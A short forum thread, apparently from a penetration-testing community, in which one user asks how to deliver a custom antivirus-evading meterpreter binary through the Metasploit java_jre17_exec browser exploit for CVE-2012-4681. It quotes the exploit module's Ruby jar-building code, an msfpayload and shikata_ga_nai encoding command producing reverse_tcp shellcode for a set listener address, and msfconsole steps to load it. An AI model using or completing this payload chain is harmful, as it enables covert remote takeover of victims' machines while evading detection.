Thread: java_jre17_exec custom applet

  1. #1
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    2

    java_jre17_exec custom applet

    Hello BT!

    I'm trying to use java_jre17_exec with an applet having my custom exe meterpreter payload.
    I've generated a FUD meterpreter binary and I want to embed it into a jar so I could use it with java_jre17_exec.

    Here's the exploit:
    Code:
    /opt/metasploit/msf3/modules/exploits/multi/browser/java_jre17_exec.rb
    The interesting lines are:
    Code:
      p = regenerate_payload(cli)
      jar = p.encoded_jar
      paths.each do |path|
        1.upto(path.length - 1) do |idx|
          full = path[0,idx].join("/") + "/"
          if !(jar.entries.map{|e|e.name}.include?(full))
            jar.add_file(full, '')
          end
        end
        fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-4681", path ), "rb")
        data = fd.read(fd.stat.size)
        jar.add_file(path.join("/"), data)
        fd.close
        #jar.each do |num|  --------- tried to see what the jar array contains, but it doesn't show up in the console. Am I doing it wrong?
          #puts num
        #end
      end

      print_status("Sending Applet.jar")
      send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )

      handler( cli )
    end
    I think "jar.pack" is the final result.

    So I have two options:
    1) Have the "p" variable on the first line carry my custom binary, but I don't know which format "regenerate_payload()" accepts;
    2) Create my own jar and replace it with "jar.pack".

    Do you have some ideas?

    Thanks.

  2. #2
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    2

    Re: java_jre17_exec custom applet

    So I've heard about generic/custom and thought it would be a nice idea to use it with java_jre17_exec:

    I've generated my shellcode:

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.132.128 LPORT=1234 R | msfencode -a x86 -c 1 -e x86/shikata_ga_nai -t c | tr -d '"' | tr -d '\n' > /root/meter.shell
    use exploit/multi/browser/java_jre17_exec
    set PAYLOAD generic/custom
    set PAYLOADFILE /root/meter.shell
    exploit
    [-] Exploit failed: Could not locate a compatible payload for Java/["java"]

    Why?

    Another question:
    I'm using PyWin to create a FUD meterpreter binary.
    1) How could I generate shellcode from my binary so that I could use it with generic/custom along with java_jre17_exec? // later, found a Perl script which does it.
    2) Will I get an established connection in the java_jre17_exec exploiting session if I use my custom binary? Or should I open another session using multi/handler?

    Thank you.
